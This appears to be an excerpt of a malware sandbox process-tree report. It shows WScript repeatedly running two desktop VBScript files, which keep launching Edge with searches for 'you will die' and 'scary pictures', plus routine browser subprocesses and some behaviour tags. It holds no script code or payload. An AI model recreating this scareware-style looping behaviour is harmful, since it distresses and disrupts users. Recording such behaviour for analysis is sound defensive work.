"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,12330459048230253260,8705741737071541334,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
4⤵
PID:5740

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,12330459048230253260,8705741737071541334,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3
4⤵
PID:5380

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:11224

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:3612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:11280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:11292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,17326581766645209142,17451453417847876762,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
4⤵
PID:14360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,17326581766645209142,17451453417847876762,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 /prefetch:3
4⤵
PID:14368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:11344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xbc,0x104,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:11380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,12908776910625749015,11390635669535548724,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
4⤵
PID:6836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,12908776910625749015,11390635669535548724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
4⤵
PID:6664

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:11448

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:11468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:11536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:11548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,16633699489131257045,10778779052756072427,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
4⤵
PID:14040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,16633699489131257045,10778779052756072427,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
4⤵
PID:14060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:11628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x9c,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:11640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,8084209744252899083,985169545790643863,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2044 /prefetch:2
4⤵
PID:13872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,8084209744252899083,985169545790643863,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3
4⤵
PID:13896

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:11648

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:11696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:11744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:11764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,10236616906277499056,3967771988162466117,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1976 /prefetch:2
4⤵
PID:5732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,10236616906277499056,3967771988162466117,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
4⤵
PID:5772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:11836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:11848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,13909611868261772370,1237080840014913576,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
4⤵
PID:14088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,13909611868261772370,1237080840014913576,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
4⤵
PID:14120

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:11888

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:11932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:11984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:11996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,3345758715136604020,18089497402701464715,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
4⤵
PID:7408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,3345758715136604020,18089497402701464715,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
4⤵
PID:7308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:12044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:12056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16420215498553462412,13987991881818226823,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
4⤵
PID:14696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,16420215498553462412,13987991881818226823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
4⤵
PID:14704

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:12064

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:12120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:12192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x40,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:12204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1456 /prefetch:2
4⤵
PID:12516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:12524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
4⤵
PID:14184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
4⤵
PID:15388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
4⤵
PID:15396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3924 /prefetch:1
4⤵
PID:17260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
4⤵
PID:16572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2600 /prefetch:1
4⤵
PID:16868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:1
4⤵
PID:16900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1
4⤵
PID:1388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
4⤵
PID:5972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
4⤵
PID:4912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
4⤵
PID:14056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
4⤵
PID:17368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1
4⤵
PID:14356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
4⤵
PID:16404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
4⤵
PID:15812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
4⤵
PID:16856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
